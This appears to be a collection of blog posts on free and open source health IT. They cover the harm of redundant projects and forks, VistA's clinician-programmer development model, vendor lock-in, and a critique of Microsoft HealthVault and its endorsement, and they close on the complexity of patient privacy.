FOSS Sin: Pointless Duplication of Effort

Duplication of effort is viewed as a sin in the Free and Open Source software (FOSS) development community. The whole ethos of FOSS dictates that developers should work together, sharing the improvements they make to software between them. For this reason forking, or starting a redundant project, is often viewed as an attack against the community.

The taboo against forking is well-documented. Eric Raymond (or esr) wrote about this is Homesteading the Noosphere specifically in a section from Promiscuous Theory, Puritan Practice. Here he is discussing three taboos of the FOSS culture, note the first one:

The taboos of a culture throw its norms into sharp relief. Therefore, it will be useful later on if we summarize some important ones here:

  • There is strong social pressure against forking projects. It does not happen except under plea of dire necessity, with much public self-justification, and requires a renaming.

I would like to make a specific case that starting a new project, depending on how it is done, can be as violent to the community as an unwelcome fork. I believe that new projects, without new advantages, are just as damaging to the community as forks are. If the community agrees with me on this, I will ask Eric to add “starting redundant projects” to his list of taboos. [section added 4-10-08]

Two separate projects, both doing essentially the same thing in the same way, fractures the community into two factions of programmers who can no longer work together. To fully understand this problem, one has to understand a little about how the Free and Open Source development community works. The first thing to understand is the licensing.

FOSS licensing allows anyone to download software sourcecode and modify it to their hearts content. While anyone can make modifications to FOSS licensed code, there is a community standard that there is one “official” person or group who controls the official version. For Linux this person is Linus Torvalds. There are many “versions” of Linux were code is developed and improved, but the community agrees that the version that everyone trusts is the version that Torvalds releases. Legitimate Linux development always aims to add features to Linux that will ultimately meet with Linus’ approval. But this is only because of community custom, the license does not require this at all. Eric entitled the chapter above Promiscuous Theory, Puritan Practice precisely because FOSS licenses allow forking while the FOSS community frowns on forking. There is nothing, other than cultural rules, stopping me from creating an operating system kernel based 100% on the code currently residing in the repository maintained by Torvalds, and call the project “Fredux”.

If I started “Fredux” either by forking the Linux codebase, or by starting a new kernel project from scratch and posted it to sourceforge, the Linux community would either mock me or ignore me. The reason is simple; I am not important in the operating system communities and Linux is very well established. However, it would not be difficult to really piss them off. My hypothetical “Fredux” project could easily anger the Linux community by doing any of the following.

  • Post something to public forums, especially the Linux Kernel mailing list, in an attempt to attract developers from the Linux community over to Fredux.
  • Pretend in public that my project is unique or innovative in way that distracted from Linux and its legitimate competitors.
  • Get investment capital, or grant funding, at the expense of competing Linux-based projects to develop my Fredux operating system.

What do these actions have in common? They all poach resources that could have legitimately gone to the Linux community. If I started an operating system from scratch the community would react… poorly. The core issue would be that I would be acquiring resources that should have gone to Linux or another legitimate operating system project.

Why? What is wrong with starting a new operating system project? There is no problem with starting a new legitimate operating system, and then competing for resources for it. The problem comes when you start an illegitimate new operating system and try to pawn it off as a legitimate. Of course this begs the question: What makes a new project or a fork legitimate?

Here are some guidelines for when a new project might be in order. (contact me if you feel I have missed something)

  • The project uses a different programming language, which has some advantage in the field of inquiry.
  • The project addresses a serious feature gap in current projects.
  • The project addresses a serious design limitation in current projects.
  • The project uses a new programming paradigm that has advantages over those currently in use.
  • The project uses a different development process that might have some advantages.
  • The project uses a more common and accepted FOSS license than alternative projects.

So lets see how this applies to Fredux! Here is a hypothetical Fredux release announcement version .1

Fredux is a new operating system kernel available under Freds Very Open Sourcey License. Fredux is coded entirely in C which means that it compiles to blazing fast machine code. Fredux is designed to provide a kernel for a POSIX compliant operating system. Fredux consistently uses a modular approach to software design, allowing it to be extended easily. Fredux will use a distributed development model, ensuring that everyone can see the code and allowing the “many eyeballs” effect to take place. Most importantly, Fredux is completely Open Source and Free Software!

Ok, what are the problems with this announcement? First of all the “usual suspects” of FOSS operating systems (GNU/Linux, FreeBSD, OpenBSD, Hurd, etc) all use the programming language C. So there is no language benefit to Fredux. Linux and several other projects strive for POSIX compliance, so Fredux has not addressed a feature gap. Because Linux is modular there is no design advantage. Fredux is developed in the same way Linux is, ergo there is no development style advantage. Lastly, Fredux is NOT open source! You will find that Freds Very Open Sourcey license does not appear as an OSI approved license. You will also not find the license on the list of FSF approved licenses. So the license is neither “Free” nor “Open Source”. It is shame how many companies continue to market themselves as Open Source without actually stepping up and meeting the licensing requirements.

On the other hand lets look at the description of a legitimate operating system project.

Hurd is a collection of services that run on the Mach micro-kernel. The Hurd implementation is aggressively multi-threaded so that it runs efficiently on both single processors and symmetric multiprocessors. It is possible to develop and test new Hurd kernel components without rebooting the machine (not even accidentally). Running your own kernel components doesn’t interfere with other users, and so no special system privileges are required. Unlike other popular kernel software, the Hurd has an object-oriented structure that allows it to evolve without compromising its design.

This collection of sentences are taken verbatim from the Hurd main page. These sentences were re-arranged to make a point. The paragraph above details supposed advantages of using a micro-kernel design; Linux and other free operating systems usually use a macro-kernel design. The Hurd people think this is a design improvement on Linux. This description lists features (modify the kernel without rebooting) and architecture advantages. One can debate issues like macro-kernel vs. micro-kernel for days on end (and people do), what I am trying to clarify here is that because Linux is so well-established and capable, the Hurd project differentiates itself and clarifies why it is also a legitimate project right on the projects home page.

On the project home page for the OpenBSD project we find.

The OpenBSD project produces a FREE, multi-platform 4.4BSD-based UNIX-like operating system. Our efforts emphasize portability, standardization, correctness, proactive security and integrated cryptography. OpenBSD supports binary emulation of most programs from SVR4 (Solaris), FreeBSD, Linux, BSD/OS, SunOS and HP-UX.

Again taken verbatim from the openBSD home page. Again, note the emphasis on things that differentiate the project from the dominant Linux project. OpenBSD is famous for its focus on security, on the main page, it covers this advantage. It is also famous for supporting lots of architectures, again right on the main page. I hope that I am demonstrating, very explicitly, what it means to establish legitimacy in the context of a currently dominant project or projects. OpenBSD even goes so far as to list the projects and products that it competes with.

When multiple projects are legitimate it is reasonable for each project to compete for developers. Want to work with the most popular OS project? Choose Linux. What to work with a bunch of people obsessed with security? That would be OpenBSD. What to work on a micro-kernel? Work with Hurd.

But you should not work on Fredux. It has no advantages over any of these projects. The competition between legitimate projects is… well… legitimate. But the FOSS community will instantly attack anyone who pouches resources for a project that has no discernible advantage over an existing project.

In the medical FOSS community, we are particularly sensitive about it. We have a small community, and dividing it is a real problem. It happens too much already, for “legitimate” reasons. The holy grail in FOSS Health IT is the creation of a Electronic Health Record (EHR). We have several legitimate projects in this space. All of the legitimate projects are starving for resources like developers, documentation writers, clinical experts, funding sources and users.

What are the “legitimate” projects competing to build the best FOSS EHR? Sorry, but this post is already too long. That question merits a whole article on its own.

For now I want to talk about three projects in particular that together illustrate the problem of duplication of effort. Tolven, OpenMRS and ExampleProject [update 4-10-08 to protect the guilty, the name of the offending project has been removed]. Tolven and OpenMRS both have reputations for being mature, Java-based projects. Here is the description of Tolven.

Tolven EHR and PHR products are a suit of Java based technologies that use the latest in Open Source Java application toolkits to create a heavily Object Oriented, MVC EHR application. In short the Tolven strategy is to a very clean java-based EHR using solid OOP design with the latest tools.

Here is a description of OpenMRS.

OpenMRS is a community-developed, open-source, enterprise electronic medical record system framework intended to aid resource-constrained healthcare environments.

OpenMRS is currently implemented in Kenya, Rwanda, South Africa, Uganda, Tanzania, Zimbabwe, and Peru. Many of the developers are MIT trained and the design of OpenMRS is based on work done at the Regenstrief Institute. 2008 will mark its second year participating in the Google Summer of Code. The design of OpenMRS is carefully thought out to support a rural deployment model. OpenMRS is a very mature project. [added OpenMRS 4-10-08 to acknowledge the tremendous things the project has done]

A bit of downlow information about Tolven: At the time of the writing Tolven is going live in several installations. Tolven has a tremendously talented development team. Tolven has received substantial funding. They have an EHR and PHR already working.

On my short list of legitimate FOSS EHR systems (and believe me it is short), Tolven and OpenMRS are currently battling for the title of top Java-based project. To review; Tolven is funded, going live now, 12 full-time developers, working software = legitimate. OpenMRS is funded, deployed all-over-the-place, and backed by some of the top minds in Medical Informatics = legitimate.

ExampleProject is a Java-based EHR system using strict OOP principles and the latest Java software stack.

ExampleProject is in alpha. ExampleProject is primarily developed by one guy, who is working part-time. ExampleProject plans to have a release that can be used in a live environment by October of 2008 ( a little less than a year away from the writing) . ExampleProject is not legitimate.

In short, ExampleProject appears to be a Fredux. What is worse, ExampleProject is constantly put forward as a legitimate project on LinuxMedNews, EMRupdate and the openhealth mailing list. Those forums are intended to be open and so censoring ExampleProject news would be unethical. The problem is that it appears to the un-initiated as though ExampleProject is important, when in fact it is exactly the opposite, an illegitimate project. ExampleProject has attracted at least two other part-time developers, and seems to be succeeding in acquiring attention and resources that properly should go to Tolven, OpenMRS or some other project. ExampleProject is guilty of the sin of duplication of effort. Everything they are doing has already been done, and well, by another project in the same programming language. Every developer that works with ExampleProject instead of working with Tolven or OpenMRS, is accidentally wasting their time. The same is true of beta testers, investors, and others who might be interested in working with a project. Because Tolven and OpenMRS continue to improve, and a greater rate than ExampleProject, it is very unlikely that ExampleProject will ever catch up. While it is fine for the project manager of ExampleProject to waste his time, it is not OK for him to trick others in the community into wasting time with him.

I have discussed this issue with the ExampleProject project manager. Before I mentioned it to him, he had never heard of Tolven. After spending about ten minutes on the Tolven site he said that the big difference between Tolven’s efforts and his own was that ExampleProject was using Swing, where Tolven was using AJAX. This seems like it might be a real legitimate technical difference, except that Tolven would likely be very happy for someone from the community to step up and create a thick-client using Swing. They would probably say something like “We do not have time to work on both AJAX and Swing interfaces. But our software design should allow any ‘viewer’ type. If you feel Swing interfaces would be better, and were willing to write it yourself, we would be happy to modify our interfaces enough to make that possible.” Even if Tolven were unwilling, the great thing about open source is that you can prove your technical points without the permission of the project manager. If Tolven or OpenMRS were shown that a Swing interface was better than an AJAX interface, they would probably adopt Swing.

A great example of a project that has spawned a sub-project specifically to address differences of opinion regarding user interfaces is the Kubuntu project, which is Ubuntu, only with KDE instead of Gnome.

When a separate project is justified is a complex issue. In fact, I gave Neil Cowles of the Tolven project a stern lecture about why he should be working through the OSCAR project, which was the dominate Java based EHR project before Tolven came on the scene. Since that lecture Tolven has proven to me and the community generally that they are legitimate. It is possible that ExampleProject, despite its small beginning, will grow into a mature open source EHR. They could prove me wrong.

Right now I would guess that ExampleProject is about one year and a million dollars of development behind Tolven or OpenMRS. If you are a developer, clinician, investor, entrepreneur, or administrator you should probably work with Tolven or OpenMRS if you want a Java-based FOSS EHR. (I will update this article if this ever changes).

I hope I have accomplished two things at this point. I hope I have shown, through a hypothetical example and a real one, examples of when duplication of effort is a problem. I also hope that I have said enough about ExampleProject to steer those who might want to work with a Java-based EHR to Tolven or OpenMRS.

-FT

(updated to clarify content and remove offending project name in April 10, 2008 if you care, just go read an archived version to find out who ExampleProject was)

(updated for readability Feb 27, 2008)

Why is VistA good? the VistA open source development model

Recently, VA VistA has been getting a tremendous amount of attention. Lets take a look at the recent events that highlight what VistA is and why it is important.

The question I would like to ask is “how did this happen?”. Lets get the story straight. Federal employees developed what appears to be the EHR at the backbone of the highest quality medical system in the United States. That makes no sense.

I defy my readers to give me legitimate examples of something that any government creates, programs, or manufactures internally that is provably superior than commercial alternatives. The only thing I have thought of is money. Various governments might be considered experts at manufacturing currency.

Despite the inability of governments to “make” for themselves the US government seems to have some cool stuff. Air craft carriers? corporation-built. Jet plane? corporation-built. Bridges? corporation-built. Now for the madness: World class Electronic Health Record (EHR)? government-built.

As the Federal Government considers how to further improve VistA it makes terrible decisions because it does not actually understand why VistA is good in the first place. At the heart of this problem is the fact that some of these Federal administrators are no longer in awe of the “miracle of VistA”.

The “miracle of VistA” is that a branch of the US Government, which has no primary expertise in software development, was able to create one of the most highly regarded electronic health records in the world.

VistA is good because it, like typical open source projects, evolved. In fact, the evolution of VistA is an alternative open source development model that is comparable in scope and significance to those found in the most popular open source projects. The best run FOSS projects evolve, but in slightly different fashions. The Linux kernel is famous for the “benevolent dictator” model now enabled by git. The Apache project has succeeded with the “wise council” model, that has in turn been successfully applied to other projects besides the core web server. Like Linux, the Apache project has developed tools specifically designed to enable the model that they use. You can easily find studies about what makes the development of Apache and Linux tick. Here is a short description of the elements of VistA development that made it successful.

VA VistA is developed in a pair programming paradigm, not two coders working side by side, but one coder and one clinician. Each VA hospital was free to develop software that meet local needs. Local hospital administrators paired one clinician, intimately familiar with a given clinical need, and one advanced MUMPS programmer, who together encoded clinical knowledge into VistA. Each local VistA programmer answered to the needs of the local hospital administration. This helped to ensure that the hospitals needs were never overlooked by a “centralized” software architect. The best software, after initial development and testing at one hospital, was quickly distributed throughout the system for hospitals hungry for similar functionality. The methods for sharing software between hospitals has become more and more formalized, and like Apache and Linux programmers, VistA programmers developed collaboration tools designed specifically to meet the needs of this distributed development environment. The hospital from which a feature originated became the de facto program manager for that feature, coordinating future improvements. Poor code was criticized and systematically abandoned in favor of good code. VistA is not actually one program, rather it is hundreds of small programs, each of which evolved and improved separately and together. No one person can “understand” what VistA is, instead VistA experts usually are familiar with a few of the VistA programs, and know which other VistA experts are familiar with the other programs. VistA is one of the oldest software projects to rely on a distributed, collaborative development model, from its inception.

Obviously, the process is more complex than can be described in a simple blog post. There is enough here to demonstrate several important points.

  • VistA was not “designed” by anyone, it evolved in a collaborative fashion similar to modern open source products
  • Because the “clinical pair programming” has been happening for more than twenty years, VistA encodes a tremendous amount of clinical expertise that is impossible to “recode” via a traditional design process.
  • VistA was made in a fashion that makes it more like an organism and less like a house or a car.
  • Replacing portions of VistA with proprietary systems is similar to, and works as well as, amputating human limbs and replacing them with prosthetics.
  • Centralizing VistA development is foolish and will never improve the EHR software. The right way to improve VistA is to encourage the evolution of the software in a process similar to the way that one would breed animals.
  • The current VA reorganization, which has local VistA programmers reporting to and paid by a centralized office in Washington, has destroyed the control and influence of local VA hospital administrators over the direction of VistA
  • Frustrated VistA progammer’s are flocking to private corporations like Medsphere or to non-profit organizations like WorldVistA in order to ensure that VistA continues to thrive. This brain-drain will ultimately damage the VA’s ability to improve VistA.
  • Something needs to be done to ensure that VistA continues to evolve.

Decisions like the recent one use Cerner’s lab system in the VA are made by administrators who do not understand what VistA is. I hope that this article will help you to understand why those familiar with VistA and Open Source software (like WordVistA’s Joseph Dal Molin and Doctors Steve Shreeve and Ignacio Valdes) are so put off by the Cerner announcement. Further this is why the typically technical HardHat’s mailing list is boiling with posts which expose the problems within the current VA thinking far more exactly that I have done here.

Now if I could just convince my congressman.

-FT

Buying paint and vendor lock-in

An article I wrote about Vendor Lock-in in health software has been published in the recent Fall 07 edition of EHR Scope.   From the article:

 You can fire your paint store, your dentist, your lawyer, your mechanic and even your
doctor. You can fire them for any reason. Yet you cannot fire your proprietary EHR software vendor. Or at least, not without also changing the software that you use. So I guess you could fire your proprietary software vendor, but only in the sense that you could “fire” your mechanic, if it meant you were forced to buy a new car.

I will give EHR Scope the exclusive on the article for a few months, and then I will republish it on GPLMedicine.org

-FT

HealthVault: Medically, Legally, and Politically Savvy but Technically Uninformed.

Dr. Deborah Peel has endorsed Microsoft’s HealthVault PHR. From the Patient Privacy Rights press release:

PatientPrivacyRights.Org founder, Dr. Deborah C. Peel, will stand with Microsoft in Washington, D.C today at a press conference to announce the launch of HealthVault.

Is Dr Peel qualified to make this recommendation?

Please take a look at Dr. Deborah Peel’s bio, she has done an impressive amount of medicine and privacy activism. At least on this bio, she lists no formal computer science training. On the same page we find the bio’s of the other members of the Patient Privacy Rights board members. Please note especially the bio of Tina Williamson (use this link as the one on the bio page is broken) who was formerly the Vice President of Marketing for a dot com company. This work should count as negative experience for determining the validity of marketing claims as per sourcecode. Perhaps the computer science expertise upon which Dr. Peel relies is on staff? Nope no computer science trained staff there.

According to the Patient Privacy Rights website, there is no competent electronic security or privacy expert with actual computer science training associated with Patient Privacy Rights organization. But remember the Privacy Coalition is much more than just the Patient Privacy Group! It is made up of 45 different organizations with interests in patient privacy. Perhaps some of these organizations are informing Deborah Peels recommendation of the most abusive, monopolistic software company on the planet as the “leading” caretaker of the American consumers healthcare record.

Of the 45 organizations, (which are probably great organizations…) only three are technology oriented. One of them is a meta blog site called NewsBull. For the moment I will assume that blogging expertise does not necessarily translate into informed insights into the complexities of protecting patient information, and I will exclude the possibility that informed recommendations came from NewsBull.

The other two organizations with a technical focus are Electronic Privacy Information Center (EPIC) and Computer Professionals for Social Responsibility (CPSR)

From what I can tell the most technically impressive person at EPIC is Simon Davies, the rest of the staff appear to be well-meaning policy types. I contacted him to see if he was informing Dr. Peels recommendation. His reply:

“I’m still looking into this technology and am hoping to find out more details on the security aspects fairly soon…”

Not exactly a glowing endorsement, instead it sounds like typical statements from someone who recognizes the depth of complexity involved. I doubt that Dr. Peels technical assessment was informed by Simon Davies.

CPSR, on the other hand, is clearly the home of some very serious tech talent. CPSR was one of the organizations that fought the Clipper chip nonsense. It is currently lead by Annalee Newitz and Fyodor Vaskovich, of nmap fame. These people obviously have enough technical muscle to make definitive statements regarding the security of Microsoft. I am still talking to them but so far it does not seem like they were consulted, Fyodors first response to me began:

“Hi Fred. I wouldn’t trust Microsoft with my health records either….”

Somehow, I doubt that Deborah Peel asked the author of nmap what he thought about a PHR from Microsoft before delivering her unqualified recommendations. The fact that she might have had access to that level of expertise and did not insist on consultation is pretty shocking. Of course, it takes some insight to know just how important nmap and Fyodor are in security circles.

Why would someone make a recommendation like that without possessing a tremendous amount of technical savvy or without consulting someone who had a tremendous amount of technical savvy? Only someone who assumed that this was merely a legal/medical/ethical issue rather than a legal/medical/ethical/technical issue. I have a degree in psychology, and it would be utmost of hubris for me to question a prescription that Dr. Peel gave to one of her patients. It would be totally unethical for me to recommended specific drugs to a mental health patient, despite that fact that I have some informal on-the-job experience with mental health drugs.

The problem with psychoactive drugs, and with medical information privacy, is that the devil is in the details. If I was forced to choose an anti-depression medication for someone, I would probably choose one that I had worked around alot, something with a big name that made me and my patients feel more comfortable. 8 times out of 10 my prescription might work fine, but I have no idea why it would not work the other 2 times, no idea how to determine if it was working or not and no idea what to do to fix it. I have a four year degree in mental health… what would it take for me to get that last 20% of prescribing potential? I would need two years of undergraduate courses in hard life sciences, followed by four years of medical school and then four years of residency. In short, to move from 80% accuracy in understanding of drug impact to something like 98% accuracy takes about a decade (not to mention the time required by board certification) . Hardly seems worth it… until you think about how easy it is to kill someone with drugs. Would you want to see someone who was 80% sure that the drugs you were given would not kill you?

Psychiatrists are qualified to make recommendations for mental health drugs, but their medical training does not qualify them to examine source code and determine if they match high level privacy guidelines. Based on my personal experience it takes at least 7 years to really have a clue about a specific technology area like this. I have been studying this for 13 years now, and I am often humbled when I discover just how little I know about this stuff. Even with over a decade of training I often feel overwhelmed about what I should do, just concerning the technical issues involved. I would never presume move outside of my area of expertise to make any clinical decisions.

Dr. Peel should have the same humility when it comes to technical issues. Despite this, Dr. Peel has said “Microsoft is setting an industry standard for privacy.” I am not the only one who thinks that is ridiculous.

But wait, having expertise in medicine does not exclude expertise in Computer Science generally or elctronic privacy specifically. It is possible to have both skill sets in one person.

What happens when a board certified psychiatrist also has a masters in Computer Science? What happens when the same person spent a decade studying the way information moves in a computer system AND a decade studying medicine? Then they write posts like this one from Dr. Valdes of LinuxMedNews. Granted, I tend to agree with Dr. Valdes on issues like software freedom and ethics in medical computing. Granted, there are experts at Microsoft who would be able to speak intelligently regarding the technical concerns that I am raising. Many of Microsoft’s experts have experience that are equivalent to Dr. Valdes’ training. But those experts are not speaking for 45 different organizations with legitimate interests in patient privacy endorsing a company with arguably the worst security and privacy track ever. In short, Dr. Peel is guilty of hubris. While she may have good intentions and clearly has a sincere desire to protect patient privacy, she appears to be very much past her technical depth.

Of course I could be wrong. I have not seen Dr. Peels vita. If Dr. Peel will publish her full resume and it contains solid computer science based privacy training and experience that she has left off of her online biography, I will be happy to retract some of these criticisms. The only thing that can justify Dr. Peels endorsements are a full source-code review by a professional electronic privacy expert. If Dr. Peel can show that she had access to such a review, then I would be happy to retract some of these criticisms. Finding this article unchanged and unamended implies that my assumptions about Dr. Peel are, in fact, correct.

If HealthVault were to be successful it would be good for Microsoft’s bottom line, but terrible for our cultures. Indeed Dr. Peel is right about one thing, Microsoft would be “leading” us. Those wearing shackles are often lead by others.

-Fred Trotter

HealthVault: What to do if Microsoft does nothing

Somehow I doubt that Microsoft will respond to my criticisms. This is what the Free and Open Source community needs to attempt if Microsoft refused to budge.

We need to write a tool, using the Microsoft HealthVault API to export the data from HealthVault. Preferably this should export to a standard format, but comma delimited is better than nothing.

If you are investor who wants to make a business around this tool, please contact me and I will put you in touch with a technical team (not me.. I have no interest in this just now). If you are a programmer and you would like to work on this, contact me to be part of the technical team.

When confronted with proprietary software and no alternatives, hack around the problem.

HealthVault: How to fix it

Microsoft often does the wrong thing. But that does not mean they have to. There are three requirements for behaving ethically as a PHR host.

  1. You must release all of the sourcecode to your PHR under a license that qualifies as both “Free (as-in-Freedom-not-price) Software” and Open Source.
  2. You must allow for the export of all data in a standard format like CCR.
  3. If you are going to allow “partners” to use proprietary code, (which you should not) you must inform your consumers that the medical data given to those partners could become locked.

Pretty simple. By releasing sourcecode, Microsoft would ensure that the software could be run without Microsofts help. That means that Microsoft might go away in two hundred years or so, but the HealthVault software would not. By allowing your consumers to download their data in a standard format you would ensure that the data would not be trapped in a proprietary format.

Recently Microsoft has released two licenses that were approved as open source licenses. These would be ideal for use in this environment.

Will this happen? I think it has a snowballs chance, but perhaps, if Microsoft does not listen, Google might.

HealthVault: The Food critic never took a bite.

I hope I have made my case that “patient privacy” is complex enough that merely “Recognize that patients have the right to medical privacy” is the ethical equivalent of saying “When considering the medical ethical issue of abortion , you must recognize that often women want to get pregnant and have a child.” This is a great example of a statement that sounds good, is completely true, and yet gets us nowhere.

Generally all of the “Patient Privacy Principles” have this problem. They are great principles but when you get deeper, to the level that is required when implementing software, it is obvious that they are only useful in spirit. For instance.

“Deny employers access to employees’ medical records before informed consent has been obtained”

Sounds good right? But does that mean that you will require consent to inform the employer of a workers compensation injury status? Doesn’t the employer have the right to know the ongoing status of a workplace injury without repeated informed consent? What, exactly does informed consent mean? When was the last time you started a new job and did not sign all of the fifteen CYA forms that you employer put in front of you? Does that count as informed consent? Again, obviously the spirit of the law here is good, which is something like “the employers should not be able to discriminate against employees based on health information” but that does not cut it when making software, we have to actually determine exactly what system will do and what it will not do, in order to write software.

So are the Privacy Principles flawed? Only when their interpretation is left to a private company with no possible way for patients to review how the code actually works!

Deborah Peels endorsement of Microsoft’s HealthVault is the equivalent of a food critic looking at a magazine food ad to make a recommendation for a restaurant. Have you ever looked at those ads when you were really hungry, you see the roasted turkey browned to perfection with a pat of butter slowly melting on it. Looks delicious! It is impossible to make that photograph with food that also tastes good. Food photographers work all day on food photographs, they cannot afford to have food that changes in appearance over the course of an hour. Can you imagine trying to include a fresh bowl of guacamole in a picture with ten other foods? Long before the picture was ready the guacamole would look disgusting. That beautiful turkey browned to perfection is actually a frozen turkey that has had the skin “browned” using a paint remover gun. The pat of butter… well, lets just say its not butter. I know this might seem obvious, but in order to judge the quality of food, a food critic must actually taste the dish.

There is no way that Dr. Peel can verify one way or another that HealthVault works the way Microsoft says it does. For instance, it would be trivial for every new piece of data for every patient to be automatically emailed to Bill Gates, or Fred Trotter. That “email the record” functionality would change nothing in the appearance of the user interface that Dr. Peel evaluated (I assume she looked at the interface). The only way to sort this out is to examine the sourcecode. Any competent Computer Scientist would acknowledge that this is trivially true: obviously it is not what Microsoft says that matters, nor is it what the software appears to do! What matters is what the software actually does and the only way to determine this, one way or another is to read the sourcecode. There is a long and glorious tradition in the software industry of shall we say “fudging” what the software actually does for marketing purposes. Is Dr. Peel qualified to examine this source code vs. marketing material gap? More on this issue later.

-FT

Privacy, a Complex Problem Underestimated.

I have passed my CISSP certification, marking me as an Information Security Expert. I had to pass a complex test and demonstrate that I had three years of full-time security experience to become CISSP certified. I have a four year degree in Computer Science, and I have been trained in Information Warfare by the United States Air Force at the Air Force Information Warfare Center in San Antonio. I have been trained in physical security by the United States Marine Corps (Hoorah). I have worked in Healthcare IT Security for over 5 years now. Frankly, I find the issue of Health Information Security to be extremely complex. Here are examples of the thorny issues that I face as a professional. (this article was originally written about HealthVault, but applies so broadly I removed HealthVault from the title 10-04-11)

There are various State and National laws that govern the disclosure of HIV or AIDs status. These often mean that portions of medical records must be operate with different disclosure rules based on whether they reveal a persons HIV status. For instance imagine the physician discussing a patient with AIDS in the notes section for that patient.

” It would be good if Patient X could maintain their exercise regime. However, given his level of immune function, Patient X should stay away from public gymnasiums, which can be unsanitary. I recommend any kind of constant aerobic activity, three times a week for at least 30 minutes each.”

Normally a message like this would be ideal for a PHR to pass to a personal trainer, however the middle sentence arguably reveals the HIV status of the patient. There was no mention of the terms “HIV” or “AIDS” so a simple text search of the document could not easily determine that it was associated with HIV status. Yet this piece of patient information should be treated differently. The level of awareness that a PHR would need to have in order to determine that the note above is related to HIV status is equivalent to human intelligence. The PHR would need to understand English to such a high degree that it would be very close to passing the Turing Test.

The alternative, of course, is to have a person validate every piece of data to see if they reveal HIV status for patients whose PHR records are tagged with HIV positive status. But how many records could such a custodian hope to manage? What level of human-error would be acceptable from such a custodian? Assuming all the records were correctly tagged, how could a human accurately review thousands of medical data points in a given record?

But even those issues ignore the problem of who tags a record with HIV status. Perhaps the patient should be in charge of tagging the account with HIV status, so that automated systems could attempt to handle the rest. But what if a patient wants to withhold that status from the PHR?

What about Family planning and pregnancy status? Physicians must be very careful to follow local laws to know what extent a patients parents can be informed about their under-aged daughters reproductive condition. However, any other medical condition would obviously be under the purview of the child’s parents or guardians.
There are also cases where the patients themselves cannot access their own records. Many psychiatrist records must be protected in this manner.
Can a patient remove the information that they have diabetes from their own record? Can they remove their allergy to penicillin? What if they removed it on accident? If patients can accidentally remove data, or can remove a diagnosis or allergy that they do not like, how can a physician or other healthcare provider rely on the contents of the PHR? If a physician knows that they cannot rely on the contents of the PHR, why would they both to add information themselves. If physicians do not add information to the PHR, why should its contents be trusted. Electronic trust is tricky.

If the patient cannot totally control every aspect of the record, does the patient really own the record? Does the healthcare provider own the record, even though the law often compels providers to produce and distribute a patients record?

How much information should payers (insurance companies, etc.) be able to see? Payers certainly must be made aware of the procedures that they will be paying for, but they should not be given so much information that they can discriminate inappropriately.

Lets sum up. Medical records belong to the patient, except when they don’t. They should be accessible to the patient except when they shouldn’t. The records of minors are always open to their guardians except when they are closed. Segmenting data in order to protect portions of health information is currently an intractable problem of free-text analysis. Tagging patient records with critical information is difficult. Trust is far more complex than is first seems. Finally, patients should be allowed to “control” their own record, except when that control would allow them to do something that would invalidate the record.

This is just a taste of the kinds of problems that I have run across during a career as a health information privacy professional. Notice that a deep understanding of several of these problems requires enough Computer Science know-how to understand why free text analysis is a difficult problem. The other problems required at least shallow understandings of medico-legal issues, which seems simple until you consider how you are going to design a PHR or EHR to meet these requirements.

How do you design a PHR so that “control” can be so finely parsed? How do you put the doctor in charge sometimes, the patient in charge other times (except to undo what the doctor did), the teenage daughter in charge, for only one of her medical issues, in such a way that her parents are not informed about that one medical issue, but are in charge of everything else?

In short “patient privacy” is a very, very complex problem that requires some pretty high level thinking and is pretty easy to mess up. When you see someone pretending like there is a simple solution to these problems, you should be very suspect.

HealthVault: No Commitments and a Sleeping Watchdog.

Has Microsoft committed to keeping the promises that it has already made? No, just the opposite. Their privacy policy concludes:“We may occasionally update this privacy statement”

Which means that when the commitments that Microsoft has made regarding HealthVault become inconvenient, they will simply change them.

Will the data that you enter into HealthVault be secure? Would my HealthVault data be studied by my insurance company? Would access be limited to those who I choose to have access? Thank goodness Microsoft’s answer to this question was not simply “Trust Me”! Instead it is “Trust my auditor”. This is, apparently enough to satisfy the Patient Privacy Rights Foundation, and the Coalition for Patient Privacy. From a recent Patient Privacy Rights press release Dr Deborah Peel is quoted:

“Corporate claims to offer privacy mean nothing unless they are willing to take the same steps Microsoft has taken in building HealthVault,” says Peel. Microsoft has committed to independent third party audits to verify their pledge to protect privacy. “Audits are essential,” says Peel. “Technology companies have got to do better than telling consumers to just ‘trust us.’ Consumers shouldn’t trust anyone but themselves to decide who can see and use their sensitive health information.”

Microsoft’s HealthVault Privacy Policy does not have the word “audit” in it anywhere. Apparently Dr. Peel assumes that Microsoft telling her that they will get audits is sufficient to ensure that they will. Interestingly the only place that the Microsoft HealthVault press release mentions audits are when they are quoting Peel.

Apparently, this means “trust the auditors”. Of course we all know how well audits serve to protect the public from unethical corporate behavior. The alternative, which is obviously not being discussed, is the ability to inspect the code for yourself. A top GPL licensed PHR is IndivoHealth. Lets do a quick comparison.

Question: PHR Covered by HIPAA?

IndivoHealth: When it is used by a covered entity, yes.

HealthVault: No. Microsoft is not a covered entity.

Question: How is this verifiable? How can you trust that the user really has control? How can you trust that there is no proprietary back door built in to the software?

IndivoHealth: Read the IndivoHealth source code yourself. Hire an auditor of your choice to review the sourcecode. Verify that the auditor you hired is telling you the truth by hiring another auditor, again of your choice. Verify that both auditors you chose and hired are not full of… smoke… by reading the source code yourself.

HealthVault: Trust Microsoft. Trust the auditor that Microsoft pays millions of dollars a year to whistle blow on Microsoft.

I think you get the idea. Nonetheless, Deborah Peel is pretty impressed with HealthVault, from a HealthcareITNews article:

“Their model is that consumers truly should control the information and that’s the direction they want to take as a company,” said Peel. “We really think that because they are the industry leader that the rest of industry will have to follow or be left behind.”

Further:

“Microsoft has agreed to adhere to all of the privacy principles that the coalition developed in 2007, ” Peel said. “Not only adhere to them in terms of contracts but to be audited on these principles. We think they’re setting a new amazingly high bar and frankly, we think what they’re doing is really the best practice that the entire industry needs to follow.”

Well, this is good! Microsoft has agreed to follow the privacy principles! Principles are good. What are the principles? We find the principles at Patient Privacy Rights website lets go through them one at a time..

  • Recognize that patients have the right to medical privacy* (later defined as: Health information privacy is an individual’s right to control the acquisition, uses, or disclosures of his or her identifiable health data.

Microsoft’s privacy policy: ” Microsoft is committed to protecting your privacy.” I guess that settles that.

  • Recognize that user interfaces must be accessible so that health consumers with disabilities can individually manage their health records to ensure their medical privacy

Actually, Microsoft deserves credit for generally working hard in this area. Give credit where it is do. However, no commitment is made in the privacy document regarding accessibility.

  • The right to medical privacy applies to all health information regardless of the source, the form it is in, or who handles it

